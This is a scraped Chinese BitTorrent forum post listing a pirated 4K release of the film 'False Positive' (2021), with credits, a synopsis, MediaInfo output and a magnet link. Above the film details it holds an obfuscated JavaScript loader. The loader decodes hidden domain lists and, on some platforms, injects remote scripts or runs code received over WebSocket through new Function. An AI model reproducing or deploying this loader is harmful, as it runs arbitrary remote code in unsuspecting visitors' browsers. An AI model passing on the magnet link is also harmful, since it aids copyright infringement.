假阳性[中文字幕]False.Positive.2021.2160p.HULU.WEB-DL.DDP5.1.HEVC-迅雷下载 9.23GB

版主小s 11天前 571

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 假阳性
◎片  名 False Positive
◎年  代 2021
◎产  地 美国
◎类  别 恐怖
◎语  言 英语
◎上映日期 2021-06-25(美国网络)
◎IMDb链接 https://www.imdb.com/title/tt10096842/
◎豆瓣链接 https://movie.douban.com/subject/33387253/
◎导  演 李·约翰 John Lee (id:1454465)
◎编  剧 伊拉纳·格雷泽 Ilana Glazer (id:1340529)
       李·约翰 John Lee (id:1454465)
◎演  员 索菲亚·布什 Sophia Bush (id:1009254)
       贾斯汀·塞洛克斯 Justin Theroux (id:1025199)
       皮尔斯·布鲁斯南 Pierce Brosnan (id:1031219)
       沙利文·琼斯 Sullivan Jones (id:1390720)
       格瑞辰·摩尔 Gretchen Mol (id:1041153)
       伊拉纳·格雷泽 Ilana Glazer (id:1340529)
       约什·汉密尔顿 Josh Hamilton (id:1098942)
       露西·沃特斯 Lucy Walters (id:1319095)
       萨宾娜·加德克奇 Sabina Gadecki (id:1028436)
       凯利·奥科 Kelly AuCoin (id:1348237)
       Taylor Ortega Taylor Ortega (id:1457053)
       S·J·索恩 S.J. Son (id:1427588)
       桃乐丝·麦卡锡 Doris McCarthy (id:1388388)
       帕维尔·波哥泽尔斯基 Pawel Pogorzelski (id:1430546)

◎标  签 恐怖 / 皮尔斯·布鲁斯南 / 惊悚 / 2021 / 美国 / Hulu / 贾斯汀·塞洛克斯 / Horror

◎简  介
  伊拉纳·格雷泽(《大城小妞》)、贾斯汀·塞洛克斯、皮尔斯·布鲁斯南将主演A24恐怖新片[假阳性](False Positive,暂译)。约翰·李(John Lee)执导,约翰与伊拉纳操刀剧本。卡司还包括约什·汉密尔顿([八年级])、格瑞辰·摩尔、索菲亚·布什(《芝加哥警署》)。剧情暂处于保密状态。该剧将于下周纽约开拍。

  1. General
  2. Unique ID                                : 208429005529653754340898980631059388866 (0x9CCDF75F9F7D628D3D0773D74F5059C2)
  3. Complete name                            : [email protected]OM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 9.23 GiB
  7. Duration                                 : 1 h 32 min
  8. Overall bit rate                         : 14.3 Mb/s
  9. Encoded date                             : UTC 2021-07-21 09:46:46
  10. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : HEVC
  15. Format/Info                              : High Efficiency Video Coding
  16. Format profile                           : Main [email protected]@Main
  17. Codec ID                                 : V_MPEGH/ISO/HEVC
  18. Duration                                 : 1 h 32 min
  19. Bit rate                                 : 14.0 Mb/s
  20. Width                                    : 3 840 pixels
  21. Height                                   : 2 160 pixels
  22. Display aspect ratio                     : 16:9
  23. Frame rate mode                          : Constant
  24. Frame rate                               : 24.000 FPS
  25. Color space                              : YUV
  26. Chroma subsampling                       : 4:2:0
  27. Bit depth                                : 10 bits
  28. Bits/(Pixel*Frame)                       : 0.070
  29. Stream size                              : 9.07 GiB (98%)
  30. Default                                  : Yes
  31. Forced                                   : No
  32. Audio
  33. ID                                       : 2
  34. Format                                   : E-AC-3
  35. Format/Info                              : Enhanced AC-3
  36. Commercial name                          : Dolby Digital Plus
  37. Codec ID                                 : A_EAC3
  38. Duration                                 : 1 h 32 min
  39. Bit rate mode                            : Constant
  40. Bit rate                                 : 256 kb/s
  41. Channel(s)                               : 6 channels
  42. Channel layout                           : L R C LFE Ls Rs
  43. Sampling rate                            : 48.0 kHz
  44. Frame rate                               : 31.250 FPS (1536 SPF)
  45. Compression mode                         : Lossy
  46. Stream size                              : 169 MiB (2%)
  47. Title                                    : English
  48. Language                                 : English
  49. Service kind                             : Complete Main
  50. Default                                  : Yes
  51. Forced                                   : No
  52. Text #1
  53. ID                                       : 3
  54. Format                                   : UTF-8
  55. Codec ID                                 : S_TEXT/UTF8
  56. Codec ID/Info                            : UTF-8 Plain Text
  57. Duration                                 : 1 h 31 min
  58. Bit rate                                 : 56 b/s
  59. Count of elements                        : 1688
  60. Stream size                              : 38.3 KiB (0%)
  61. Title                                    : English
  62. Language                                 : English
  63. Default                                  : No
  64. Forced                                   : No
  65. Text #2
  66. ID                                       : 4
  67. Format                                   : UTF-8
  68. Codec ID                                 : S_TEXT/UTF8
  69. Codec ID/Info                            : UTF-8 Plain Text
  70. Duration                                 : 1 h 27 min
  71. Bit rate                                 : 60 b/s
  72. Count of elements                        : 1552
  73. Stream size                              : 38.5 KiB (0%)
  74. Title                                    : Spanish
  75. Language                                 : Spanish
  76. Default                                  : No
  77. Forced                                   : No


TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:6CE4B9C0258068FE30D380950F316A5BD8357B68
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)
  • shaosys 10天前
    2
    最近电影体积都好大o(╥﹏╥)o

你可以在 登录 or 注册 后,对此帖发表评论!

返回